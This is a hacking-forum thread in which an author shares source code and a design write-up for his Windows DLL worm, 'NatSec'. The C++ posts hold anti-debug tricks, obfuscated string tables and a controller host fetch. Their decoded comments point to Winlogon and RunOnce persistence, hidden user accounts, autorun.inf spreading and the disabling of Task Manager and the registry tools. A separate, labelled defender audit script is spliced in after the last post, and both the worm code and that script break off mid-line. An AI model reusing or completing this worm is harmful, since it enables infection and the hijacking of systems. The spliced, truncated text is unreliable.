
Thread: NatSec worm Source code --- Let's discuss..."vinnu"

  1. #1

    NatSec worm Source code --- Let's discuss..."vinnu"

    Author : "vinnu"
    Developer : "vinnu"
    Team : Legion Of Xtremers
    Year : 2006-2007
    IDE : VC++ 6.0
    Type : win32.dll layer worm
    Damage : None, rather has performance boosters

    NatSec (project name) worm was one of my most interesting and efficient worms in the past, with its infections in nearly every continent, but in a very secret manner and very few.
    I'm going to reveal its diminished (trimmed) variant for educational purposes, with most of its functionality removed, but it can still do enough infections.

    It does not damage any data or system resources. Even the CPU and memory utilization is very carefully controlled to keep the system running smoothly.

    The infected systems started to talk in the PAHARI language, but intelligently they keep quiet when the sysop listens to music or watches movies.
    This worm was developed using a fusion technique, I mean by fusing several techniques: it was developed in C, but it had VBS modules too.

    Now let us discuss the prerequisites of a worm structure, which are most essential for an artificial life.

    A typical worm structure:

    1. Main circuit - This circuit is responsible for controlling all the activities of the different modules. This circuit makes sure which module should be fired at exactly what time, and whether the fired module executed properly.

    Note: Some worms do not let other clones of themselves execute on the same prey. The main circuit takes care of that in one of several ways: in one technique the older executing sibling checks for the reinfection and destroys the reinfecting routines; in another the youngest sibling kills the older (elder) clones that are already executing. But in the case of tentacles scattered across several other prey processes (hijacked processes), the latter technique is not reliable and is difficult to implement, as it may destabilize the system. So the first technique is used, in which the main circuit takes care of the reinfection and kills it.

    Important note: All my other worms behaved in a similar manner too. All this stuff and these techniques are the general properties and behaviours exhibited by my worms; I am not discussing the behaviours of others' artificial lives. Every artificial life developer has his own recipe, so don't blame me for others' techniques if they are different...."vinnu"

    The main circuit is also called the motherboard, by analogy with the hardware motherboard of any system.

    2. Displacement circuit: This circuit is most important and takes care of placing the necessary parts at their appropriate positions, depending upon the privileges of the prey.
    This circuit must execute with the first priority, before most other circuits; it is necessary to call this circuit from the main (motherboard) circuit in a multithreaded environment.
    It will generate and place all the necessary modules at their proper places.

    3. Process hijacker : Being a dll layer worm, it is most necessary to hijack the victim system's appropriate processes and inject the required code into them. Every hijacked process will be zombied and will carry out a different and distinct activity.

    4. Auto trigger circuit: This is also one of the most important circuits. A worm with only this circuit is enough to survive in a single prey.
    The auto trigger circuit is actually a looped circuit which keeps on writing the triggers that are responsible for triggering the worm trigger file at the time of system restart.

    Note: All loops (worms have 99% indefinite/infinite loops) must have sleep times in them, otherwise the system will soon get unresponsive. This is a most avoidable situation.

    The sleep time must be chosen in such a way that it doesn't clog up the CPU, but not so long that a simple for loop from a command console can defeat the worm.

    5. Feedback circuit: ..............................................
    Last edited by b0nd; 09-16-2010 at 06:48 PM. Reason: Merged

  2. #2

    Source code of the worm

    // NatSec.cpp : Defines the entry point for the DLL worm Retaliator.
    // Essential : WarheaD Should be able to generate an executable or trigger file on its own.

    /***[+]
    * developer : "vinnu"
    * team : LOX (The Legion Of Xtremers)
    * capability : Extended capabilities in this version have been limited
    for security reasons, capable of performing the DDOS attacks.
    * performance : Care has been taken to avoid the cpu, memory & other resource
    consumption during native processing (The processing of other programs)
    Fixes some security issues and optimizes the cpu & memory performance.
    *
    ***/
    Code:
    #include "stdafx.h"
    #include <iostream>
    #include <windows.h>
    #include <direct.h>
    #include <TlHelp32.h>
    #include <winsock2.h>
    #include <shellapi.h>
    /*--------------MACRO SPACE---------------*/
    #define IPSZ 17
    #define KEYSZ 65
    #define MEDBUFSIZE 257
    #define MINBUFSIZE 129
    #define MAXBUFSIZE 65537
    
    #define MININTERVAL 64
    #define SHORTINTERVAL 24		//
    #define MEDINTERVAL 256			// Time intervals for sustained delay
    #define MAXINTERVAL 512			//
    #define THRDINTERVAL 10000		// Thread wait interval
    #define SMAXINTERVAL 640000		// 640 seconds
    #define HINTERVAL 3600000		// 1 hour
    
    #define FILEATTRIB 39			// Setting atributes to the SuperHidden state.
    #define FILEATTRIBW 38 //34		// Setting attributes to the Hidden+Writable state.
    #define FILEATTRIBL 34
    #define FILEUNATTRIB 32			// Recovering to normal state.
    #define FILEATTRIBAR 33			// Archive + read-only state.
    #define DIRATTRIB 54			// Directory with all attributes set.
    #define DIRUNATTRIB 16			// Just a directory.
    
    #define PORT 80						// Server port
    
    #pragma comment(lib, "ws2_32.lib")
    
    ////-----------Global Shared memory section among different processes:-circuit----------////
    #pragma data_seg (".LOXians")
    	bool nebelwerfer = false;
    	int intLoaded = 0;
    	int iscout = 0; //used for scoutThreads iteration;
    	char developer[] = "\"vinnu\" The LOXian (Legion Of Xtremers)";
    #pragma data_seg()
    ////---------Global Shared memory section among different processes:-circuit end--------////
    char SERVERWARHEAD[] = "127.0.0.1";	// Server address, Do not Remove it even if scramble present.
    char SERVERNAME[] = "loxians.net";			// Server name
    
    char INTERNALPATH[] = "\\NatSec.dll";
    char INTERNALNAME[] = "NatSec.dll";
    char DIRPATH[] = "\\NatSec";
    char DIRTERT[] = "\\Application Data\\WinNT";
    char TERT[] = "\\WinNTsec.dll";
    char INTDIRPATH[] = "\\Documents\\NatSec";
    char DIRNAME[] = "NatSec";
    char PACKFILE[] = "packQCP.lnk";
    /*--------------Global Section------------*/
    HANDLE hProcess = NULL;
    HANDLE hSnapshot = NULL;
    HANDLE hmThread = NULL;
    HANDLE scoutThreads[MININTERVAL];
    char primepath[MEDBUFSIZE], currentpath[MEDBUFSIZE];
    char primepathap[MEDBUFSIZE + IPSZ], currentpathap[MEDBUFSIZE + IPSZ], scrsav[MEDBUFSIZE + IPSZ], saverptr[MEDBUFSIZE], tertiaryap[MEDBUFSIZE + IPSZ];
    char lfailsafe[MEDBUFSIZE + IPSZ], seddir[MEDBUFSIZE + IPSZ], targetfile[MEDBUFSIZE], winbuf[MEDBUFSIZE + KEYSZ];;
    char datapacket[MAXBUFSIZE];
    char *warkeys[KEYSZ], *warcrypt[KEYSZ];
    char *plainbuffer[92];  // Plaintext buffer.
    char *requestStr = plainbuffer[10];/*"GET /lox/nxgis/qproto.txt HTTP/1.0\r\n"\
    				   "Content-Type: text/plain\r\n\r\n";	// The Query string*/
    char retr[25];		// The retrieved checksum, right after the packet arrives
    char chksm[25];		// The checksum retrieved from the datapacket file.
    unsigned short check = 0;	// The checksum to be calculated.
    bool nebel = false;			// winlogon notify circuit needs it. Will be used to terminate the loops. Do not define in shared block.
    /*----------------------------------------*/
    using namespace std;
    //-----Definition block----//
    HANDLE processStarter(LPCTSTR appname, LPTSTR cmdline);
    void cdcryptor(char **crinBuffer);
    unsigned int randNS();
    void controlsp();
    void traceLeaver();
    void privilAdj();
    void spvoice();
    void cruser();
    void sed(char *sourcedir);
    //---Definition block end--//
    Last edited by fb1h2s; 10-13-2010 at 11:05 PM.

  3. #3
    Code:
    BOOL warkeyInit()	{
    try	{					// anti-debug circuit.
    	int x = 0, y = 110;
    	y = y/x;
    } catch (...)	{
    	char *plainbuffer[91];
    	warkeys[0] = "\xdb\xb1\xb3\xab\xab\x8a\xd4\xb1\xb8\xad\xbf\xac\xaa\x8d\xbf\xae\xa7\x9f\xe3\xaf\xb8\xd1\x98\xd5\xdf\x93";
    	warkeys[1] = "\xdf\xaa\xde\xad\xfd\xfa\x9d\xe5\x9f\x9c\xda\x9d\xf7\xcb\xdf\xb8\xad\xbf\xec\x8c\xac\xcd\xb9\xef\xd7\xfd";
    	warkeys[2] = "\xcf\xac\xaa\x8d\xd8\x97\xed\xe4\xcd\x84\xa2\xa9\xc7\xa0\xb3\x9e\x94\xfa\xfc\xac\xbf\xac\xaa\x8d\xd9\xf4";
    	warkeys[3] = "\xbb\x9c\x8c\xcd\xb9\xc1\xa3\xee\x8d\xb1\x9c\xca\xee\x9a\x9f\x8a\xe5\xdc\xeb\x8c\xac\xdd\xb5\xef\xa3\xc6";
    	warkeys[4] = "\xcb\xb0\xb3\xac\xdd\x8d\xd8\xb3\xbd\xcf\xcc\xda\xb3\x8c\xac\xce\xb8\xdf\xee\xad\xbf\xb8\xc7\xd8\xcd\x99";
    	warkeys[5] = "\xff\xae\x9e\xae\xb3\xe9\xaf\xee\xaf\xea\x9d\xe5\xac\xac\x9b\xee\xe9\xda\x9d\xb1\xac\x9d\xa4\xb6\xa7\xb1";
    	warkeys[6] = "\xe9\xc3\x82\xec\xdd\xcd\xab\xad\xea\xaf\xb8\xb3\xdd\xb7\x8c\xcd\xf6\xea\xe9\x8c\xac\xd7\x8c\xef\xd9\x9f";
    	warkeys[7] = "\xf5\x9d\x87\xb1\xd8\xd8\xde\x9e\x9a\x89\x8c\xee\x9c\xfd\xea\x9d\xe5\x8f\xfd\xea\x9d\xe5\x98\xe9\xb6\xf8";
    	warkeys[8] = "\xae\xe9\x96\xac\xdd\xaa\xf5\xce\xa3\xcf\xfc\xcd\x8e\x84\x9c\x83\xd7\xce\xeb\x8c\xac\xdd\x9a\xec\xd7\xa7";
    	warkeys[9] = "\xad\xbf\xac\xaa\x8d\xbf\xac\xda\x8d\xef\xdc\x9a\xcf\x98\xb1\xad\xa4\xf4\xeb\x8c\xb8\xad\x99\xef\x96\xb3";
    	warkeys[10] = "\xea\xd4\xfe\xb1\xdd\xcd\xdc\xe9\xad\xb3\xac\xaf\x8d\xbc\x87\x8e\x9a\xd1\xcb\x8c\xac\xdc\x9d\xef\x89\xe7";
    	warkeys[11] = "\xb1\xf4\x8c\xbc\xd8\xdf\xb1\xb1\xb3\xa1\xbf\xac\xa5\x8d\x93\xdd\x89\xee\xe8\x8c\xac\xfd\xea\x9d\xe5\xb6";
    	warkeys[12] = "\x90\xb3\xdf\xde\xad\xed\xb3\xe3\xad\xb3\xe9\xa8\x8d\xbc\xaf\xda\xb1\xad\x9b\xad\x8c\xed\x9d\xdf\xca\xa4";
    	warkeys[13] = "\xde\xea\x9d\xe5\x8d\xb1\xd9\xae\x9d\xd8\xac\xba\xb3\xa5\xd5\xd8\x9f\xda\xe9\xd8\xa3\xad\xaf\xe8\xad\xc0";
    	warkeys[14] = "\xcf\x9c\x8e\xaf\xdd\xfd\xea\x9d\xe5\xbf\xa9\xd8\x88\xdf\xf2\x9e\xff\x95\xeb\x8c\x9d\x92\xcd\x8f\xd3\xe9";
    	warkeys[15] = "\xd8\x94\x89\xac\xdd\x9a\xdf\xe2\xaa\x86\x8c\xb1\x9d\xbc\x8f\x86\xdc\xb8\x9f\xac\xaa\x8d\x9d\xef\xe7\xa4";
    	warkeys[16] = "\x95\xfd\x9c\xb1\xdf\xde\xfc\xfd\x9a\x9c\xfd\xea\x9c\xfd\xea\x9d\xe5\xaa\xfd\xea\x99\xe5\x8a\xe9\xb6\xf8";
    	warkeys[17] = "\xdf\xdf\x8f\xaa\x87\x9f\x9c\xd2\x87\x8f\xcf\x8a\xcf\x9f\xf1\xde\x9c\xfd\xef\x84\xac\xd4\x94\xef\xde\xb2";
    	warkeys[18] = "\xa5\xa1\xe7\xb5\xd8\xd3\xb1\xea\xd0\xd1\x9c\xfd\xa7\x8d\xc7\xae\xb4\xd8\xd4\xde\x96\xf4\xea\x9d\xe6\xd0";
    	warkeys[19] = "\x97\xda\x9f\xd5\xfa\x98\xa0\xd1\x82\x97\xf1\xb6\xf0\xfd\xa8\xf1\xc2\x8d\xcd\x8c\xac\xff\xc6\xa0\xb7\x84";
    	warkeys[20] = NULL;
    }
    return TRUE;
    }
    void cryptInit()	{
    try	{ int x = 64, y = 32, z = 128;
    	y = 256/(x - x)*(y - y)*(z - z);
    } catch(...)	{
    	plainbuffer[0] = "\xEA\x83\x84\x85\x9B\xA4\xE4\x9F\x89";//"127.0.0.1";//	SERVERWARHEAD[] = "127.0.0.1";	// Server address
    	plainbuffer[1] = "\xF0\xB5\xE5\x9E\xAA\xB1\xCB\x83\xD1\x89\xF8";//"loxians.net";// SERVERNAME[] = "loxians.net";
    	plainbuffer[2] = "\xE3\xE2\xCB\xF9\x8A\x91\xD8\xB2\xE8\xA1\xD5";//"\\NatSec.dll";// INTERNALPATH[] = "\\NatSec.dll";
    	plainbuffer[3] = "\xC3\xB9\xC7\xEE\xAA\xAF\xF4\xD7\xE0\xC0";//"NatSec.dll";// INTERNALNAME[] = "NatSec.dll";
    	plainbuffer[4] = "\xB2\xA7\xBB\xE9\xE2\xC9\xFE";//"\\NatSec";// DIRPATH[] = "\\NatSec";
    	plainbuffer[5] = "\xD0\xAE\xA9\xEF\x99\xF4\xE4\xD0\xAC\xB1\xB1\xF0\xBA\xCD\xED\x9A\xFD\xA1\xBD\xF4\x8B\xC1\xA9";//"\\Application Data\\WinNT";// DIRTERT[] = "\\Application Data\\WinNT";
    	plainbuffer[6] = "\xD0\xFB\xB4\xF4\xA2\x83\xD4\xC8\xDC\x82\xCE\xE1\xD3";//"\\WinNTsec.dll";	// TERT[] = "\\WinNTsec.dll";
    	plainbuffer[7] = "\x80\xAD\xC2\xD0\xD9\xC2\xE8\xD2\xF3\xFD\xC6\x9F\xAA\xF8\xFF\xB9\xFE";//"\\Documents\\NatSec";// INTDIRPATH[] = "\\Documents\\NatSec";
    	plainbuffer[8] = "\xD3\x84\xC2\xC3\xD6\xBC";//"NatSec";	// DIRNAME[] = "NatSec";
    	plainbuffer[9] = "\x95\xEC\xD2\xB2\xFF\xDE\x88\x82\xD6\xDD\xCE";// PACKFILE[] = "packQCP.lnk";
    //----------under-construction-------------
    	plainbuffer[10] ="\xB5\xDB\xAB\xB5\xC4\xE0\xF2\xEA\xE2\xE1\xAB\x8E\xB1\xE7\xA6\xDD\xAD\xE8"\
    			 "\xB0\x96\xC5\xA8\xF8\xC9\xE9\x9C\xC7\xD2\x88\xE8\xB0\x9D\x84\xBD\x97\xBA"\
    			 "\x94\xC1\xE7\xD0\xDD\xD6\xBA\xB0\x88\xC7\xBA\xCE\x98\x9E\xFD\x91\x83\xFC"\
    			 "\x91\xC5\x8F\xDB\xB7\xD5\x80\xAA\xD9\x96\xAB\xBA\xE1\xDE\xAA\xCB\xE5\xA2"\
    			 "\xE2\xB5\xEF\xFE\xAA\xE7\x85\xF1\xEC\x91\x8E\xED\xC2\xDE\x9E";
    			//"GET /lox/nxgis/qproto.txt HTTP/1.0\nContent-Type: text/plain\n\n";	// *requestStr
    	plainbuffer[11] = "\xEF\x83\xA4\xF6\xB6\xF6\xB4\x8E\xF7\xD2\xFF\xE6\xFB\x9D";//"retaliator.dll";	// subkey
    	plainbuffer[12] = "\xE1\xCF\xE3\xCA\xFD\xCF\xF0\x94\xEB\xDD\xBD\xF9\xAC";//"MenuShowDelay";
    	plainbuffer[13] = "\x84\x92\xA9\xD8\xDD\xEC\xAA\xF2\xB1\xA9\xA4\xE7\xD0\xC6\xB4\xCF\xD5\xEA"\
    					  "\xC8\xAD\x95\xC2\xDB\xC3\xDD\xFE\x85\xB7\xCE\xEE\xFE\xA8\xD7\xB5\xF5\x8B"\
    					  "\xFF\xC2\xF5\xA5\x80\xC6\xCF\xE5\x89\xB5\x88\xE5\xC9\xAE\xE9\xAA\xDB\xB6"\
    					  "\xA7\xDF\xC1\xC9\xAF";//"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer"; //subkey
    	plainbuffer[14] = "\xA7\xC0\xAA\xDD\x83\xEB\x80\xF8\xD5\xEB\x8B\xA8\xAF\xE9\xDE\xFE\xE8\xCA";//"NoDriveTypeAutoRun";
    	plainbuffer[15] = "\xAC\xAC\xED\x87\xF8\xE9\xC5\x9B\xB7\xB0\xEA\xE8\xE6\xE0\xBD\xF9\x89\xB6"\
    					  "\xDE\x8A\xE1\x89\x98\xF2\x89\xC4\xBA\xD3\x8B\xDD\x80\xF9\xC2\xFD\xE7\x94"\
    					  "\xA0\xC2\xA8\x99\xBF\xD2\xC9\xF9\xEE\xB8\xBC\x92\xAC\xE1\xBC\xF4\x8D\xB0"\
    					  "\xC2\xC0\xDA\xC2\xDE";//"CurrentControlSet\\Control\\Session Manager\\Memory Management"; // subkey
    	plainbuffer[16] = "\x99\xA4\xAF\x88\xCF\xDF\xC9\xFF\xEC\xDB\xEE\xE0\xFD\x94\xB3\xE9\xCF\xA9\xE9\x86\xFF\x82";//"DisablePagingExecutive";
    	plainbuffer[17] = "\xDC\xD2\xAD\xB9\xC8\xBE\xCA\x90\xD9\xD6\x84\xEB\xEC\xDF\xC7\xBF";//"LargeSystemCache";
    	plainbuffer[18] = "\xDC\xB5\x87\xAC\xD1\xC2\xC3\xC8\xFD\xA1\xA1\xF9\xE2\xF3\x99\x98"\
    					  "\x99\xF6\x91\xD0\xD9";//"Control Panel\\Desktop"; // fsubkey = "Control Panel\\Desktop";
    	plainbuffer[19] = "\xE2\xF2\xDA\xFB\xF1\xBD\xCA\xFA\xF0\xE7\xE4\xFE\x9D\x88\xD7\xFA\x9B\xE8"\
    					  "\xED\x88\xB7\x92\x99\xF5\xEB\x8E\xB6\xDF\x88\x98\xEF\x80\xC4\x89\xBC\xFC"\
    					  "\x97\xF9\x80\xD9\x96\x83\x9A\xF7\xDA\xEB\xF0\xEE\xB7\xF5\xD3\x8E\xEE\xB9"\
    					  "\xFE\x9F\xBD\xF9\x99";//"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced";// fsubkey1
    	plainbuffer[20] = "\x87\x91\xD0\xA0\xBD\xDC\xB4\x95\xCB\x97\xF6\xB6\x88\xF7\xD3\xBE\xE4\xE3"\
    					  "\xAD\xE1\x99\x93\xCC\x9E\xB5\xFE\xED\xC2\xF8\xA3\x85\xD5\xC5\xF6\xBE\xDF"\
    					  "\xC7\xFD\xCE\xF8\xA7\xD8\xD7\xC3\xE3\xFB\xC3\xE3\xD3\xC1\xC0\xF0\x8D";//"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"; // shellsubkey
    	plainbuffer[21] = "\xDF\xE3\x8B\xED\xB8\x96\xAF\x8A\xF0\xE7\xE4\xBB\xE5\x82\x97\xA2\xE2\xD6"\
    					  "\xF5\x90\xC9\xDD\xFA\xFB\x8D\x8F\x8C\xF1\xF8\xF6\xCE\xAC\x86\xC9\xF9\xE2"\
    					  "\xB9\xEF\xA4\xD1\x9D\xE4\xDE\xF2\x96\xB9\xF3\xF1\xE6\x8A\xBB\x84\xE2\xF0"\
    					  "\x8E\xC5\x8A\xC0\xAF\xAA\xDC\xF2\xCF\xBE\xE2\xAD\xDD\xC9\xBC\x90\x8F\xC0"\
    					  "\xE9\xDE\x82\xD1\xAC\x9A";//"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList"; // accsubkey
    	plainbuffer[22] = "\x93\x80\xBD\xCA\xC2\xC2\xC7\x8C\xAD\xF6";//"\", ntevent";
    	plainbuffer[23] = "\xF4\xA0\xA8\xB2\xF1\xE8\xEC\xFE\xC0\xF9\x85\x8F\xBD\x92\xE6\x93\x84\xE9"\
    					  "\x8A\xFA\x83\x98\x8E\xCC\x9A";//"Explorer.exe winntobj.vbs"; // shellval = "Explorer.exe winntobj.vbs";
    Last edited by fb1h2s; 10-13-2010 at 10:56 PM.

  4. #4
    Code:
    plainbuffer[24] = "\xDF\xC5\xEB\xCB\xDB\xBB\xFF\x8A\x80\xD7\xA6\xFB\xC3\xC2\xD7\x9B\x8D\xF8"\
    					  "\xE4\xFA\xF0\x81\xF2\xDC\x9D\xA7\xA2\xF2\xA8\xBF\xAE\x8C\xC3\xC7\xFA\xCA"\
    					  "\xFF\xCF\xEE\xE1\xF4\x8D\x9B\xE3\xC0\xB5\xFE\x86\xEC\x94\xED\xB1\xF4\xCC"\
    					  "\xB4\xB0\xC3\xD4\xC1";//"software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer"; // subkey
    	plainbuffer[25] = "\xE0\x86\xCE\xF9\xCB\xCE\xA8\xD4\xF1\xD6\xC4\xEF\x9F\xF2\xAC\xA5\xC2\xAA"\
    					  "\xB6\xCA\x8C\xE3\xD5\xB6\xD9\xEE\x84\xEF\xCF\xC1\xD7\xB0\xB6\xEB\x8C\x8C"\
    					  "\xAA\xD0\xC4\xC0\x86\xF1\x90\xA0\xF0\xE7\xCC\xB4\x98\x99\xC1\x96\xC6\xDA"\
    					  "\xAC\xED\xB2";//"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\system"; // subkey1
    	plainbuffer[26] = "\xDC\xE3\xBD\xCA\xFC\xC4\xE2\xE4\xF9\x8B\x82\xCA";//"SearchHidden";
    	plainbuffer[27] = "\x9B\xB6\xFC\xCB\xE5\xF3\xF9\x80\xE2\xE8\xA6\xF9\xBB\xED\x88\x8A\xF3\x92\x83\xF7";//"DisableRegistryTools";
    	plainbuffer[28] = "\xD2\x9D\x99\xFC\x84\xBC\xF2\x8E\xFE\xA6\x91\xF5\xC7\xA3";//"DisableTaskmgr";
    	plainbuffer[29] = "\xEB\xC5\xDA\xC0\xC6";//"Shell";
    	plainbuffer[30] = "\xA5\xBE\xCC\xDE\xDA\x8F";//"natsec";
    	plainbuffer[31] = "\xFF\xDC\xDE\xCF\xE8\xB7\xA7\xDA\xEA\xE9\x99\xD0\xAC\xC6\xA1\xF8\xC5";//"ScreenSaveTimeOut";
    	plainbuffer[32] = "\x9F\xB9\xC1\xE9\xC9\xA0\xEB\xBE\x98\xC8\xCD\xF1\xB4\x8B\xA8\xFA\x8A\xDC\xFB";//"ScreenSaverIsSecure";
    	plainbuffer[33] = "\xBF\x9E\x9F\xE5\xFE\xAB\xF9\xFD\x9D\x98\xEF\xC9";//"SCRNSAVE.EXE";
    	plainbuffer[34] = "\xEE\x86\xFD\x98\x8F\xF3\xB6\xF9\x9F\xD3\xAC\xC7\x84\xF3\xE3\xA8\xDE";//"screenSaveTimeOut";
    	plainbuffer[35] = "\xFF\xB2\xE2\x98\x8F\xEF\xBF\xFD\xC3\xE5\xCD\x90\x8F\xE9\xD6";//"ShowSuperHidden";
    	plainbuffer[36] = "\x97\xF8\x9D\xE7\x82\xDD\xC7\xBE";//"Kernel32";
    	plainbuffer[37] = "\x92\xC2\x8C\xD7\xAF\xC4\xD1\x9B\xC9\xFF\xC5\xEE";//"LoadLibraryA";
    	plainbuffer[38] = "\x8B\xF0\xBC\x9D\xAF\xC2\xDF\xCA\xB4\xE0\xA9\xAC\xEE\xE1\xDC\xB2\x9B\x9E"\
    					  "\xC1\xB2\xD6\xC7\xBC\xE7\xA8\x81\xC2\xBC\xE0\x99\xFE\xF8\xFC\xB9\xD9\xB6"\
    					  "\x9B\xAB\xFD\xE6\xC2\x81\xC8\xAA\x8C\xE5\xE8\xEF\xD4";//"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce"; // subkey
    	plainbuffer[39] = "\xCF\xB2\xAC\xC9\xB2\xEB\xAF\xAF\xC5\xA8\xE3\x8A\xC4\x97\xAC\xB0\xE9\xDE"\
    					  "\xDB\xC8\xF5\xBC\xE3\xE0\xB8\xF9\x93\xDC\x84\xAC\xEE\x98\x81\xF0\xFA\xB1"\
    					  "\xE6\x9C\xB7\xDD\xCB\xFD\xB5\xC0\xB6\x9C\xDF\x89\xB5";//"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"; // lmsubkey
    	plainbuffer[40] = "\xC4\xBE\xF0\xA4\xAA\xE9\xA3\x87\xD1\x80\xE5\xCF\x8D\xA9\xD3\xD8\xE2\xAF"\
    					  "\xED\xE4\xC2\xC5\xEE\xBB\xC6\xCB\x8D\xF1\xF8\xF6\xCE\xCA\xDC\xD5\xFA\x8D"\
    					  "\xDB\xEE\xB4\xEA\xA6\xB6\xFC\xB1\xF6\x89\xC4\x93\x96\xF2\x82\xF0\xF2\x86"\
    					  "\xD3\x98\xBF\xB6\xDE\xD4\xE3\xBB\xE5\xC2\x83\xED\x9C\xB2\x9E";//"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\WinNTsec"; // ntfsubkey
    	plainbuffer[41] = "\xC9\xE9\xE2\xA9\xD5\xAD\x90\xDC\xAD\x93";//"rundll32 \"";
    	plainbuffer[42] = "\xEE\xF6\xC7\xFE\xC5\xA9\xDF\xBA\x9C\xFA\xDE\xCA\xAF\xBD\xAC\xDD";//"\",triggerWarheaD";
    	plainbuffer[43] = "\x87\xB7\xE7\x9A\xB8\xA3\xDF";//"ntevent"; // val2 = "ntevent";
    	plainbuffer[44] = "\xB4\xD4\xE8\xF8\xBD\xF9\x9E";//"*NatSec";
    	plainbuffer[45] = "\xD8\xEF\xBB\x80\x8A\xE1\xC9";//"DllName";
    	plainbuffer[46] = "\xE1\xF6\x88\xF9\xDD";//"Logon";
    	plainbuffer[47] = "\xE2\x80\xED\xCE\xAC\x8C\xD9\xD4\xDF\xCD";//"StartShell";
    	plainbuffer[48] = "\xBA\xDC\xEC\xCE\xDB\xAF\xC1";//"Startup";
    	plainbuffer[49] = "\x89\x9D\xB9\xD1\xD9\xFC\x8B\xDF\xA5\xAA\xF2\xDD\xCE\xAB\x98\x98";//"StartScreenSaver";
    	plainbuffer[50] = "\xB1\xDE\xE9\xFC\xE2\xFE\xCE\xEA\xE3\xB2\xEB\xFE\xDA\xCF\xFF";//"StopScreenSaver";
    	plainbuffer[51] = "\xC6\x86\xD5\x93";//"Lock";
    	plainbuffer[52] = "\xF0\xCF\x8B\xDA\xBB\xB8";//"Unlock";
    	plainbuffer[53] = "\xEC\xBE\xE5\xF8\x97\xD0";//"Logoff";
    	plainbuffer[54] = "\xFA\xE2\xCC\xDA\xF4\xF7\x86\xC3\xD4";//"PostShell";
    	plainbuffer[55] = "\x9F\xDC\x8C\xB8\x93\xA1\xC9\xC9\xF9";//"Reconnect";
    	plainbuffer[56] = "\xFD\xA8\xD0\x8D\xE2\xDF\xF2\xAF\x8D\xEE";//"Disconnect";
    	plainbuffer[57] = "\xF0\xAF\xCD\xAB\x81\xDF\xCA\xD6\xE9\xB1\xA3\xFF";//"\\autorun.inf"; // *autoptr
    	plainbuffer[58] = "\xB5\xA4\xE3\x81\xB8\x83\xF8\x83\xAF\xF7\xFD";//"\\gameNS.EXE"; // *natptr = "\\gameNS.EXE";
    	plainbuffer[59] = "\xB2\xCE\x98\x9E\xFC\x89\xE6\x9C\x9E\xF8\xCB\xFA\x88\xC2";//"\\Retaliate.bat"; // *natbptr = "\\NatSec.bat";
    	plainbuffer[60] = "\xFC\xCC\xCA\xD8\xC5\xFF\xCA\xC2\x87\x87\xD4\x88\xF2\xAA\xB8\xDC\xC2"\
    					  "\xD7\x80\xCB\xEF\xD7\xC0\xF4\x80\xF8\x93\x9F\xA7\x9B\x91\xBB\xA2\xAE"\
    					  "\xC9\xE3\xDC\xD8\xCA\xFD\xDD\xE3\xAE\xF3\xA2\xEB\xF8\xC3\xFC\xEB\x86"\
    					  "\xEC\x90\x91\x9B\xFE\x9C\xBD\xBB\xD8\xC5\x93\xD5\xDA\xD4\xD1\xB7\x99"\
    					  "\xAE\xE1\x8B\x84\xE0\xF0\x92\x9A\xF8\x8B\x8B\xDE\xD2\xAB\x8D\xC8\x8E"\
    					  "\xEF\xB1\xC8\xC7\x88\xC4\xE4\xDD\xDB\xBF\x9F\xCF\xFA\xD9\x86\xD6\xDF"\
    					  "\xBA\xA9\xC5\xAB\x99\xF8\xC5\xC3\xDE\xAD\xCB\xED\xB9\xC8\x9A\xC0\xD0"\
    					  "\xA5\xA8\xF0\xA8\x9D\xAB\x83\xC2\xC1\x84\xD4\xE0\xB9\xF9\xFC\xD6\xFD"\
    					  "\x9F\x8B\xEE\x8C\xDC\x89\xBE\xE7\xAD\x9F\xFF\x8B\xE1\x82\xE2\xFA\xBE"\
    					  "\xED\xFB\xBB\x8C\xAA\xF1\xEF\xC3\xAF\xFF\xF3\xC2\xCE\xE9\xAC\xDD\xF4"\
    					  "\xD7\xEA\xA6\xA8\xD0\xF6\xDF\x90\x87\xEE\x87\x82\xC8\xF9\xA1\xF3\xC1"\
    Last edited by fb1h2s; 10-13-2010 at 10:59 PM. Reason: ewqr
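    A defender-side audit of the persistence and policy locations that the decoded-string comments in posts #3 and #4 name (Winlogon Shell and Notify, SpecialAccounts\UserList, RunOnce, the Policies\Explorer and Policies\System values, autorun.inf). This is an added PowerShell example, not part of the thread or the worm's own code; the hive choices (HKLM for the "Windows NT" paths, both hives for the policy values) are assumptions, since the decoded comments give no hive.

```powershell
# Added example (not the thread's or the worm's code): read-only audit of the
# registry and file locations the decoded comments in posts #3 and #4 refer to.
# Run from an elevated PowerShell prompt on the host under examination.

$Findings = New-Object System.Collections.Generic.List[string]

function Get-RegValue {
    param([string]$Path, [string]$Name)
    try {
        $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop
        return $item.$Name
    } catch {
        return $null   # key or value absent: nothing to report
    }
}

# 1. Winlogon "Shell" should be exactly explorer.exe. The source's decoded
#    shellval is "Explorer.exe winntobj.vbs", i.e. an extra script appended.
$wl = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'   # hive assumed
$shell = Get-RegValue $wl 'Shell'
if ($shell -and $shell.Trim() -ine 'explorer.exe') {
    $Findings.Add("Winlogon Shell is '$shell' (expected 'explorer.exe')")
}

# 2. Winlogon\Notify packages are DLLs loaded into winlogon.exe; the source
#    registers one named WinNTsec. List every package and its DllName.
$notify = Join-Path $wl 'Notify'
if (Test-Path $notify) {
    Get-ChildItem $notify | ForEach-Object {
        $dll = Get-RegValue $_.PSPath 'DllName'
        $Findings.Add("Winlogon Notify package '$($_.PSChildName)' -> DllName '$dll'")
    }
}

# 3. SpecialAccounts\UserList entries hide accounts from the logon screen.
$ul = Join-Path $wl 'SpecialAccounts\UserList'
if (Test-Path $ul) {
    (Get-ItemProperty $ul).PSObject.Properties |
        Where-Object { $_.Name -notmatch '^PS' } |
        ForEach-Object { $Findings.Add("Hidden account entry: $($_.Name) = $($_.Value)") }
}

# 4. Policy and Explorer values the source touches. The decoded subkeys carry no
#    hive, so both HKLM and HKCU are checked (assumption).
$policyChecks = @(
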